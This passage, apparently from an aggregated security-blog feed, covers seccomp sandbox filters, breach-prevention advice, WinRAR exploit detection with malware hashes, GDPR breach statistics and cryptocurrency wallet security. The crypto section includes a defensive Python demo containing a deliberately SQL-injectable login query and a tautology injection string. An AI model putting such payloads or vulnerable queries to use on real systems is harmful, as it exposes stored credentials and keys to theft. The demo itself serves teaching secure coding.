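  prog.push_back(BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0));
  prog.push_back(BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS));
  prog.push_back(BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(seccomp_data, nr)));
  for (size_t i = 0; i < allowed.size(); ++i) {
    // On match, jump over the remaining compares and the KILL to the final ALLOW.
    const uint8_t to_allow = static_cast<uint8_t>(allowed.size() - i);
    prog.push_back(BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, allowed[i], to_allow, 0));
  }
  prog.push_back(BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS));
  prog.push_back(BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW));
  return prog;
}

// Interpreter for the BPF subset emitted above (absolute loads of nr/arch,
// JEQ against a constant, RET constant). Unknown instructions fail closed.
uint32_t EvaluateFilter(const std::vector<sock_filter>& prog, const seccomp_data& sd) {
  uint32_t acc = 0;
  for (size_t pc = 0; pc < prog.size();) {
    const sock_filter& ins = prog[pc];
    switch (ins.code) {
      case BPF_LD | BPF_W | BPF_ABS:
        if (ins.k == offsetof(seccomp_data, nr)) acc = static_cast<uint32_t>(sd.nr);
        else if (ins.k == offsetof(seccomp_data, arch)) acc = sd.arch;
        else return SECCOMP_RET_KILL_PROCESS;  // field not modelled here
        ++pc;
        break;
      case BPF_JMP | BPF_JEQ | BPF_K:
        pc += 1 + (acc == ins.k ? ins.jt : ins.jf);
        break;
      case BPF_RET | BPF_K:
        return ins.k;
      default:
        return SECCOMP_RET_KILL_PROCESS;
    }
  }
  return SECCOMP_RET_KILL_PROCESS;  // fell off the end: fail closed
}

// What would the policy do with syscall `nr` issued by an x86_64 process?
uint32_t PolicyDecision(const std::vector<sock_filter>& prog, int nr) {
  seccomp_data sd{};
  sd.nr = nr;
  sd.arch = AUDIT_ARCH_X86_64;
  return EvaluateFilter(prog, sd);
}

// Installs the filter for the calling process (irreversible). no_new_privs
// lets an unprivileged process apply a filter.
bool InstallFilter(std::vector<sock_filter>& prog) {
  sock_fprog fprog{};
  fprog.len = static_cast<unsigned short>(prog.size());
  fprog.filter = prog.data();
  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return false;
  return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog) == 0;
}

int main() {
  // Constructed allowlist for a pure compute library such as zlib: it may only
  // use already-open file descriptors, manage memory and exit.
  const std::vector<uint32_t> allowed = {SYS_read, SYS_write, SYS_mmap, SYS_munmap,
                                         SYS_brk, SYS_exit, SYS_exit_group};
  std::vector<sock_filter> prog = BuildAllowlistFilter(allowed);
  std::printf("write  -> %s\n", PolicyDecision(prog, SYS_write) == SECCOMP_RET_ALLOW ? "allow" : "kill");
  std::printf("openat -> %s\n", PolicyDecision(prog, SYS_openat) == SECCOMP_RET_ALLOW ? "allow" : "kill");
  // Calling InstallFilter(prog) here would confine the rest of this process.
  return 0;
}
```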

Try for yourself

It only takes a few moments to get up and running with Sandboxed API. If Bazel is installed:

sudo apt-get install python-typing python-clang-7 libclang-7-dev linux-libc-dev
git clone https://github.com/google/sandboxed-api && cd sandboxed-api
bazel test //sandboxed_api/examples/stringop:main_stringop

This will download the necessary dependencies and run the project through its paces. More detailed instructions can be found in our Getting Started guide, and be sure to check out the examples for Sandboxed API.

Where do we go from here?

Sandboxed API and Sandbox2 are used by many teams at Google. While the project is mature, we do have plans for the future beyond just maintaining it:

  • Support more operating systems - So far, only Linux is supported. We will look into bringing Sandboxed API to other Unix-like systems such as the BSDs (FreeBSD, OpenBSD) and macOS. A Windows port is a bigger undertaking and will require some more groundwork to be done.
  • New sandboxing technologies - With things like hardware virtualization becoming almost ubiquitous, confining code into VMs for sandboxing opens up new possibilities.
  • Build system - Right now, we are using Bazel to build everything, including dependencies. We acknowledge that this is not how everyone will want to use it, so CMake support is high on our priority list.
  • Spread the word - Use Sandboxed API to secure open source projects. If you want to get involved, this work is also eligible for the Patch Reward Program.

Get involved

We are constantly looking at improving Sandboxed API and Sandbox2 as well as adding more features: supporting more programming runtimes, different operating systems or alternative containment technologies.

Check out the Sandboxed API GitHub repository. We will be happy to consider your contributions and look forward to any suggestions to help improve and extend this code.

Weekly Update 130

Well that was a hell of a week of travel. Seriously, the Denver situation was just an absolute mess but when looking at the video from the day I was meant to fly in, maybe being stuck in LA wasn't such a bad thing after all:

But despite the dramas I did still (just) make it and got to do my talk so as close as it was, I'm still yet to miss one. This week I'm talking about a bunch of different travel things, upcoming events, data breaches and those ridiculous bloody cookie warnings everyone hates so much. Next week I'll be in Seattle and will probably also be pushing the update out a little late, but I will still be pushing it out. Until then, here's the week that was:

References

  1. I'll be keynoting at the Akamai Security Summit World tour in Sydney (it's on Thursday 28 of this month)
  2. Then I'll be doing another NDC meetup in Sydney (like Brisbane and Melbourne, that event will be oversubscribed so get in early)
  3. ixigo denies a breach (but resets everyone's passwords anyway...)
  4. These cookie warnings are absolutely ridiculous (they always were, but GDPR just continues the insanity)
  5. Ad blockers are also part of this whole problem (killing all ads - even those run responsibly - just makes the whole thing even worse)
  6. Varonis is this week's blog sponsor (watch their DFIR team investigate a cyberattack using their data-centric security stack)

How to Safeguard Your Family Against A Medical Data Breach

The risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out, or in the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records compromised by a hacking or IT incident, at a cost to consumers of nearly $6 billion.

The IoT Factor

Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) — which, in short, means everything is digitally connected to everything else — consumer products also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, and heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals is children’s health information (stolen from pediatrician offices), since a child’s credit record is clean and therefore more useful in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” says Samani.

Healthcare professionals, hospitals, and health insurance companies, while responsible for giving criminals an entry point, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices

According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their own protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

Protecting kids online – are we doing our best?

I’m trying to work through some thoughts about how companies repeatedly take advantage of consumers’ privacy in the US.  The latest being TikTok, a video sharing app acquired from musical.ly, which has agreed to pay $5.7 million to settle allegations that it collected personal information from children – a violation of COPPA or the Children’s […]

The post Protecting kids online – are we doing our best? appeared first on Privacy Ref Blog.

Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250)

Earlier this month Check Point Research reported the discovery of a 19-year-old code execution vulnerability in the wildly popular WinRAR compression tool. Rarlab reports that there are over 500 million users of this program. While a patched version, 5.70, was released on February 26, attackers are releasing exploits in an effort to reach vulnerable systems before they can be patched.

One recent example piggybacks on a bootlegged copy of Ariana Grande’s hit album “Thank U, Next” with a file name of “Ariana_Grande-thank_u,_next(2019)_[320].rar”

When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes. User Account Control (UAC) does not apply, so no alert is displayed to the user. The next time the system restarts, the malware is run.

Figure 1 – Malformed Archive detected by McAfee as CVE2018-20250!4A63011F5B88
SHA256: e6e5530ed748283d4f6ef3485bfbf84ae573289ad28db0815f711dc45f448bec

Figure 2 – Extracted non-malicious MP3 files

Figure 3 – Extracted Malware payload detected by McAfee as Generic Trojan.i
SHA256: A1C06018B4E331F95A0E33B47F0FAA5CB6A084D15FEC30772923269669F4BC91

In the first week since the vulnerability was disclosed, McAfee has identified over 100 unique exploits and counting, with most of the initial targets residing in the United States at the time of writing.

 

McAfee advises users to keep their anti-malware signatures up to date at all times. McAfee products detect known and unknown malformed ACE files exploiting the vulnerability as CVE2018-20250![Partial hash], starting with the following DAT releases:

  • V2 DATs version 9183 released March 2, 2019
  • V3 DATs version 3634 released March 2, 2019

Additional GTI coverage exists for email-based attacks, in tandem with the Suspicious Attachment feature. When this feature is enabled, Artemis![Partial hash] detections will occur on known exploits.

Update: An earlier version of this article used the phrase User Access Control (UAC) which has now been changed to User Account Control (UAC) and the term “bypass” which has now been changed to “does not apply.”

The post Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250) appeared first on McAfee Blogs.

McAfee CTO @ RSA: Catching Lightning in a Bottle or Burning Bridges to the Future?

I spoke last week at the RSA Conference in San Francisco on the subject of AI related threats and opportunities in the cybersecurity field. I asserted that innovations such as AI can strengthen our defenses but can also enhance the effectiveness of a cyber attacker.  I also looked at some examples of underlying fragility in AI that enable an attacker opportunity to evade AI based defenses. The key to successfully unlocking the potential of AI in cybersecurity requires that we in the cybersecurity industry answer the question of how we can nurture the sparks of AI innovation while recognizing its limitations and how it can be used against us.

We should look to the history of key technological advances to better understand how technology can bring both benefits and challenges. Consider flight in the 20th century. The technology has changed every aspect of our lives, allowing us to move between continents in hours, instead of weeks. Businesses, supply chains, and economies operate globally, and our ability to explore the world and the universe has been forever changed.

But this exact same technology also fundamentally changed warfare. In World War II alone, the strategic bombing campaigns of the Allied and Axis powers killed more than two million people, many of them civilians.

The underlying technology of flight is Bernoulli’s Principle, which explains why an airplane wing creates lift. Of course, the technology in play has no knowledge of whether the airplane wing is connected to a ‘life-flight’ rescue mission, or to a plane carrying bombs to be dropped on civilian targets.

When Orville Wright was asked in 1948 after the devastation of air power during World War II whether he regretted inventing the airplane he answered:

“No, I don’t have any regrets about my part in the invention of the airplane, though no one could deplore more than I do the destruction it has caused. We dared to hope we had invented something that would bring lasting peace to the earth. But we were wrong. I feel about the airplane much the same as I do in regard to fire. That is, I regret all the terrible damage caused by fire, but I think it is good for the human race that someone discovered how to start fires, and that we have learned how to put fire to thousands of important uses.”

Orville’s insight was that technology does not comprehend morality—and that any advance in technology can be used for both beneficial and troubling purposes. This dual use of technology is something our industry has struggled with for years.

Cryptography is a prime example. The exact same algorithm can be used to protect data from theft, or to hold an individual or organization for ransom. This matters more than ever given that we now encrypt 75% of the world’s web traffic, protecting over 150 exabytes of data each month.  At the same time, organizations and individuals are enduring record exploitation through ransomware.

The RSA Conference itself was at the epicenter of a debate during the 1990’s on whether it was possible to conditionally use strong encryption only in desirable places, or only for desirable functions.  At the time, the U.S. government classified strong encryption as a munition along with strict export restrictions.   Encryption is ultimately just math and it’s not possible to stop someone from doing math.  We must be intellectually honest about our technologies; how they work, what the precursors to use them are and when, how and if they should be contained.

Our shared challenge in cybersecurity is to capture lightning in a bottle, to seize the promise of advances like flight, while remaining aware of the risks that come with technology.  Let’s take a closer look at that aspect.

History repeats itself

Regardless of how you define it, AI is without a doubt the new foundation for cybersecurity defense. The entire industry is tapping into the tremendous power that this technology offers to better defend our environments. It enables better detection of threats beyond what we’ve seen in the past, and helps us out-innovate our cyber adversaries. The combination of threat intelligence and artificial intelligence, or human-machine teaming, provides us with far better security outcomes—faster—than either capability on its own.

Not only does AI enable us to build stronger cyber defense technology, but also helps us solve other key issues such as addressing our talent shortage. We can now delegate many tasks to free up our human security professionals to focus on the most critical and complex aspects of defending our organizations.

“It’s just math”

Like encryption, AI is just math. It can enhance criminal enterprises in addition to its beneficial purposes. McAfee Chief Data Scientist Celeste Fralick joined me on stage during this week’s keynote to run through some examples of how this math can be applied for good or ill. (visit here to view the keynote).  From machine learning fueled crime-spree predictors to DeepFake videos to highly effective attack obfuscation, we touch on them all.

It’s important to understand that the cybersecurity industry is very different from other sectors that use AI and machine learning. For a start, in many other industries, there isn’t an adversary trying to confuse the models.

AI is extremely fragile, so one focus area of the data science group at McAfee is adversarial machine learning, where we’re working to better understand how attackers could try to evade or poison machine learning models. We are developing models that are more resilient to attacks using techniques such as feature reduction, adding noise, distillation and others.

AI and False Positives: A Warning

We must recognize that this technology, while incredibly powerful, is also incredibly different from what many cybersecurity defenders worked with historically. In order to deal with issues such as evasion, models will need to be tuned to high levels of sensitivity. The high level of sensitivity makes false positives inherent and something we must fully work into the methodology for using the technology.

False positives can have catastrophic results. For an excellent example of this, watch the video of the keynote here if you haven’t seen it yet. I talk through the quintessential example of how a false positive almost started World War III and nuclear Armageddon.

The Take-Away

As with fire and flight, how we manage new innovations is the real story. Recognizing that technology does not have a moral compass is key. Our adversaries will use the technology to make their attacks more effective, and we must move forward with our eyes wide open to all aspects of how technology will be used: its benefits, its limitations and how it will be used against us.

 

Please see the video recording of our keynote speech RSA Conference 2019: https://www.rsaconference.com/events/us19/presentations/keynote-mcafee

 

The post McAfee CTO @ RSA: Catching Lightning in a Bottle or Burning Bridges to the Future? appeared first on McAfee Blogs.

Moving Up: An Interview with Jadee Hanson

Jadee Hanson, CISO, Code 42

What does it take to build a security program from scratch, in a company without any existing security initiatives in place? To answer this question, we spoke with Jadee Hanson, Code 42’s CISO, whose builder mentality translates into everything she does.

Q:  How did you first become interested in the cybersecurity industry?

A:  I was always very interested in technology in high school and I had a mentor that saw my interest.  He was the technology coordinator for our entire school district, and I worked for him a few days a week.  We would buy all sorts of different computer parts and then assemble the lab’s computers.  He taught me the basics for everything that falls under the information technology umbrella.

After graduation, I worked for Deloitte in their enterprise risk services team.  Deloitte was on the leading edge of cyber risk.  I was doing pen testing when companies didn’t know what a pen test was.  It was a great opportunity that transitioned me from IT into cybersecurity and spurred a deeper interest in the industry that never went away.

Q:  What was it about the industry that attracted you to it?

A:  What I found fascinating with cybersecurity was this notion of the bad guy—an adversary trying to do something bad to a company.  In cybersecurity, the mission is to figure out how to protect against those adversaries.

Another appeal was that at the time, people didn’t really understand what cybersecurity was.  I was the first to raise my hand for any cybersecurity engagement.

“I think I was naturally drawn to the industry because it was new, which allowed me the chance to build programs from scratch.  My mentors commonly describe me as a builder, with the ability to take something from nothing and build a robust process and program around it.”  

Q:  How did this mentality as a “builder” help you as you progressed in your career?

A:  When I worked at Target, I got to leverage many of the skills I had in building programs.  We built risk functions, security operations functions, and training awareness functions.  All of these different functions needed to be in place in order to have an effective security program.

Then, when I started at Code 42, there was a lot to do, a lot to change and a lot to build, so this was my next project, essentially.

Q:  Your ability to see gaps and build solutions seems to carry into your life outside of work.  Can you tell me a bit about how you started your nonprofit, Building without Borders?

A:  I first visited the Dominican Republic in 2004 with my husband, but then when I came home, I had kids and got busy.  In 2010, however, I went back with my sister on a mission trip.  There we built houses, met families, and ran a children’s program.  Coming home, though, I realized it wasn’t enough—I couldn’t just go there once a year and not do more.

“I realized there was this major problem, and there was something I could do about it.”

As of now, we’ve built 39 houses there and have initiated a healthcare program as well as food delivery.  It’s been really rewarding to see the change in the community and the people there.  They now feel supported and hopeful, not abandoned.

Q:  How do you think companies could encourage more people, specifically women, to enter the industry?

A:  We have to start encouraging participation at the next generation of workers.  One of the ways we do this at Code42 is through a partnership with Girl Scouts.  We house Girl Scouts here to get their STEM Badge or Cybersecurity Badge.  In fact, we’re the first company within the River Valley region of Girl Scouts to host the Cybersecurity Badge.  They’re not all going to choose a career in cybersecurity, but the thing that we’re trying to do is make sure that the younger generation knows and believes that if they do want to choose this career path, there’s a place for them.

Q:  What advice do you have for anyone interested in starting a career in the cybersecurity industry?

A:  Confidence is key.  You know your worth, and you know what you can do, so be confident in who you are and what you bring to the table.

To learn more about or donate to Building Without Borders, click here.
And be sure to check out our Women in Cybersecurity Series for more great advice.

The post Moving Up: An Interview with Jadee Hanson appeared first on GRA Quantum.

Five data protection tips from the DPC’s annual report

The first post-GDPR report from the Data Protection Commission makes for interesting reading. The data breach statistics understandably got plenty of coverage, but there were also many pointers for good data protection practice. I’ve identified five of them which I’ll outline in this blog.

Between 25 May and 31 December 2018, the DPC recorded 3,542 valid data security breaches. (For the record, the total number of breaches for the calendar year was 4,740.) This was a 70 per cent increase in reported valid data security breaches compared to 2017 (2,795), and a 56 per cent increase in public complaints compared to 2017.

1. Watch that auto-fill!

By far the largest single category was “unauthorised disclosures”, which was 3,134 out of the total. Delving further, we find that many of the complaints to the DPC relate to unauthorised disclosure of personal data in an electronic context. In other words, an employee at a company or public sector agency sent email containing personal data to the wrong recipient.

Data breaches in Ireland during 2018 and their causes

A case study on page 21 of the report illustrates this point: a data subject complained to the DPC after their web-chat with a Ryanair employee “was accidentally disclosed by Ryanair in an email to another individual who had also used the Ryanair web-chat service. The transcript of the webchat contained details of the complainant’s name and that of his partner, his email address, phone number and flight plans”.

It’s a common misconception that human error doesn’t count as a data breach, but in the eyes of GDPR, this isn’t the case. The most common reason for breaches like this comes from the auto-fill function in some software applications like email clients.

Where an organisation deals with high-risk data like healthcare information (because of the sensitivity involved), best practice is to disable auto-fill. I recommend this step to many of my clients. Many organisations don’t like doing this because it disrupts staff and makes their jobs a little bit harder. In my experience, employees soon get used to the inconvenience, while organisations greatly reduce their chances of a breach.

2. Encrypted messaging may not be OK

Another misconception I hear a lot is that it’s OK to use WhatsApp as a messaging tool because it’s encrypted. The case study on page 19 of the DPC report clarifies this position. A complainant claimed the Department of Foreign Affairs and Trade’s Egypt mission had shared his personal data with a third party (his employer) without his knowledge. A staff member at the mission was checking the validity of a document and the employer had no email address, so they sent a supporting document via WhatsApp.

In this case, the DPC “was satisfied that given the lack of any other secure means to contact the official in question, the transmission via WhatsApp was necessary to process the personal data for the purpose provided (visa eligibility)”.

My reading of this is that although the DPC ruled that WhatsApp was sufficient in this case, this was only because no other secure means of communication was available.

3. Do you need a DPO?

The report tells us that there were 900 Data Protection Officers appointed between 25 May and 31 December 2018. My eyes were immediately drawn to some text accompanying that graph (below). “During 2019, the DPC plans to undertake a programme of work communicating with relevant organisations regarding their obligations under the GDPR to designate a DPO.” This suggests to me that the DPC doesn’t believe there are enough DPOs, hence the outreach and awareness-raising efforts.

Notifications of new DPOs between 25 May and 31 December 2018

Private and public organisations will need to decide whether they should appoint a full-time DPO or avail of a service-model from a third-party data protection specialist.

4. A data protection policy is not a ‘get out of jail free’ card

Case study 9 from the report concerns an employee of a public-sector body who lost an unencrypted USB device. The device contained personal information belonging to a number of colleagues and service users. The data controller had policies and procedures in place that prohibited the removal and storage of personal data on unencrypted devices. But the DPC found that it “lacked the appropriate oversight and supervision necessary to ensure that its rules were complied with”.

The lesson I take from this is, “user error” is not a convenient shield for all data protection shortcomings. Many organisations expended effort last year in writing policies, and some think they’re covered from sanction because they did so. But unless they implement and enforce the policy – and provide training to staff about it – then it’s not enough.

5. Email marketing penalties may change

My final point is more of an observation than advice. Between 25 May and 31 December, the DPC prosecuted five entities for 30 offences involving email marketing. The report details those cases. A recurring theme is that the fines were mostly in the region of a couple of thousand euro. However, all of these cases began before GDPR was in force; since then, the DPC has the power to levy fines directly rather than going through the courts. This is an area I expect the DPC to address. Any organisation that took a calculated risk in the past because the fines were low should not expect this situation to continue.

There are plenty of other interesting points in the 104-page report, which is free to download here.

The post Five data protection tips from the DPC’s annual report appeared first on BH Consulting.

Tackling The Weaknesses Outside The Blockchain System To Protect Your Cryptocurrency

There’s a general consensus in the crypto industry that blockchain cannot be hacked. This is because blockchain transactions listed on the distributed ledgers are immutable, meaning they cannot be erased, changed or reconfigured.

The distributed ledger system also has accountability built in, so that the transactions held by every node must be identical in order to achieve consensus.

Blockchains have so far proven to be impossible to hack, but organizations are using blockchain in ways that involve elements outside the blockchain itself, such as crypto wallets.

Because these elements exist outside the scope of the blockchain, they are susceptible to common web vulnerabilities, hacks, and other human errors. Therefore, if a transaction is handled improperly, it can be unintentionally listed as an official transaction.

For example, tokens stored in a wallet or on an exchange whose website isn’t secure can be stolen in a hacking episode, and the resulting withdrawal of tokens will be recorded on the distributed ledger as a valid transaction even though it is not.

So what are companies and users left to do in protecting crypto assets?

While blockchain technology offers interesting security alternatives to cybersecurity in general, that does not mean traditional cybersecurity solutions and other cyber practices are obsolete in protecting against attacks that ultimately target cryptocurrency.

Check out our tips for protecting against some of the most common cyber hacks in the crypto world.

Web Attacks

Wallets don’t actually contain any crypto; instead they hold a private key, which is needed to access, withdraw, or trade it. Wallets are not protected by the same technology that makes blockchain essentially “unhackable.”

The same goes for crypto exchanges, which is why we advise users to avoid holding significant amounts of coins on any exchange. Wallets and exchanges are also vulnerable to web attacks such as SQL injection and Cross-Site Scripting (XSS).

Hackers, for example, can launch SQL injection attacks that exploit a vulnerability in data input forms by entering malicious code into the login pages of a website or web app, thus revealing sensitive data like the private keys of wallets.

XSS attacks can be used by hackers to intercept information, including login details, exchanged between a client and server by executing malicious code in the victim’s browser.

While these attacks can be thwarted with a WAF, which monitors web traffic at the web application layer and automatically blocks malicious requests, there are other ways end users can protect themselves.

As an end user, we highly recommend that you use “cold” wallets, such as a Ledger hardware wallet, so that your private keys are stored offline, unlike “hot” wallets, which are always connected to the internet and are prone to hacking.

We also recommend that users write down their private keys and keep them in a safe location, since anyone who gets hold of your mnemonic phrase can access your wallets.
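The SQL injection described above comes down to one thing: user input being pasted into the text of a query. The following is an added example (not code from the Cloudbric post or from any wallet or exchange) that shows a login lookup written the vulnerable way next to the parameterised form that removes the bug, using an in-memory SQLite table with constructed placeholder rows. The table, column names and the `wallet_key` placeholder values are assumptions for the demonstration.

```python
import sqlite3

# Constructed in-memory user table standing in for a wallet or exchange login
# database; the "wallet_key" values are placeholders, not real keys.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, wallet_key TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("alice", "hash-of-alice-password", "WALLET-KEY-ALICE-placeholder"),
            ("bob", "hash-of-bob-password", "WALLET-KEY-BOB-placeholder"),
        ],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds the SQL text from user input, so the input can change the
    query's logic. Kept here as the 'before' version for comparison."""
    sql = (
        "SELECT username, wallet_key FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so quotes or keywords in the input stay plain data."""
    sql = (
        "SELECT username, wallet_key FROM users "
        "WHERE username = ? AND password_hash = ?"
    )
    return conn.execute(sql, (username, password_hash)).fetchall()


# The textbook tautology input: in the vulnerable query every row satisfies
# the rewritten WHERE clause, so the whole table (keys included) comes back.
TAUTOLOGY = "x' OR '1'='1"


def demo():
    conn = make_db()
    leaked = login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY)   # all rows
    blocked = login_safe(conn, TAUTOLOGY, TAUTOLOGY)        # no rows
    legit = login_safe(conn, "alice", "hash-of-alice-password")
    return len(leaked), len(blocked), legit


if __name__ == "__main__":
    print(demo())
```

A WAF in front of the site can block many such requests, but the parameterised query fixes the class of bug in the code itself, which is the layer the WAF cannot reach.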

Malware

Wallet addresses are long strings of both numbers and letters (up to 21 characters) and are difficult to memorize. When users want to transfer funds to another wallet, most opt to copy and paste the wallet address, but this shortcut creates an opportunity for certain malware to exploit.

Though not entirely new in its execution, a trojan has been discovered that monitors over 2.3 million different crypto addresses and works by exploiting the clipboard function: it replaces the intended recipient wallet address with the attacker’s.

A similar malicious program called CryptoShuffler follows this trend and is also known to manipulate wallet addresses.

Unfortunately, these substitutions often go unnoticed by users, which puts them at risk when transferring funds. To protect against such malware, it’s important for users to keep their antivirus software and operating systems up to date, perform regular malware scans, and avoid installing untrusted software.

We also recommend that users always double check the intended recipient address before transferring any funds. A good tip is to check that the first and last characters match the rightful wallet address.
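To make the "double check the address" advice concrete, here is an added example (not code from the Cloudbric post) that does what a careful wallet front end can do before a transfer: verify that a pasted Bitcoin-style Base58Check address decodes with a valid checksum, and compare it to the address the user previously confirmed. The point it demonstrates is that the checksum only catches corruption (a mistyped character); a substituted address can be perfectly valid, so only the full comparison against a known-good address catches a swap. The `EXPECTED` value is the well-known public genesis-block address; `SUBSTITUTED` and `TYPO` are constructed for the demonstration.

```python
import hashlib

# Bitcoin-style Base58 alphabet (no 0, O, I or l, which are easy to confuse).
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text):
    """Decode Base58 text to bytes; raises ValueError on a character outside the alphabet."""
    n = 0
    for ch in text:
        n = n * 58 + ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zero_bytes = len(text) - len(text.lstrip("1"))  # each leading '1' is a 0x00 byte
    return b"\x00" * leading_zero_bytes + body


def b58encode(raw):
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = ALPHABET[rem] + out
    leading_zero_bytes = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zero_bytes + out


def checksum(payload):
    """First four bytes of double SHA-256, as Base58Check uses."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def base58check_valid(address):
    """True if the address decodes and its 4-byte checksum matches its payload."""
    try:
        raw = b58decode(address)
    except ValueError:
        return False
    if len(raw) < 5:
        return False
    return checksum(raw[:-4]) == raw[-4:]


def make_address(pubkey_hash, version=0x00):
    """Build a Base58Check address from a 20-byte hash. Used here only to
    construct a second, checksum-valid address for the demonstration."""
    payload = bytes([version]) + pubkey_hash
    return b58encode(payload + checksum(payload))


def verify_recipient(pasted, expected):
    """Return (checksum_ok, first_and_last_match, full_match) for a pasted address.

    first_and_last_match is the quick visual check from the post; full_match is
    the check a wallet should actually enforce against a saved address."""
    ends_match = pasted[:4] == expected[:4] and pasted[-4:] == expected[-4:]
    return base58check_valid(pasted), ends_match, pasted == expected


# Well-known public address (the Bitcoin genesis block's coinbase address),
# standing in for the recipient the user previously confirmed.
EXPECTED = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
# Constructed: a different but checksum-valid address, standing in for one a
# clipboard-swapping trojan might paste in place of EXPECTED.
SUBSTITUTED = make_address(b"\x11" * 20)
# Constructed: EXPECTED with its final character altered, i.e. a typo.
TYPO = EXPECTED[:-1] + "b"

if __name__ == "__main__":
    for label, addr in [("expected", EXPECTED), ("substituted", SUBSTITUTED), ("typo", TYPO)]:
        print(label, verify_recipient(addr, EXPECTED))
```

Run stand-alone it prints `(True, True, True)` for the genuine address, `(True, …, False)` for the substituted one (valid checksum, but not the saved address), and `(False, False, False)` for the typo, which both the checksum and the first/last-character check catch.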

Smart contracts

Smart contracts are commonly used to facilitate and conduct credible transactions on the blockchain without intermediaries.

Because they are directly tied to these transactions, they can hold massive amounts of digital currencies, making them a lucrative target for hackers.

Bugs or errors in smart contract code can result in crypto being frozen or stolen by hackers.

On some rare occasions, hackers can also gain direct access to a smart contract by obtaining the private key, steal funds, and then replace addresses with fraudulent ones.

Engaging external auditors can help to inspect the code for vulnerabilities. For organizations, we recommend finding reputable auditors with a track record of protecting against such attacks or errors.

Fake Apps and Classic Phishing

Phishing takes all kinds of forms in the crypto world. Most phishing scams aim to either steal credentials to access wallets or trick users into sending crypto directly to addresses of scammers or hackers.

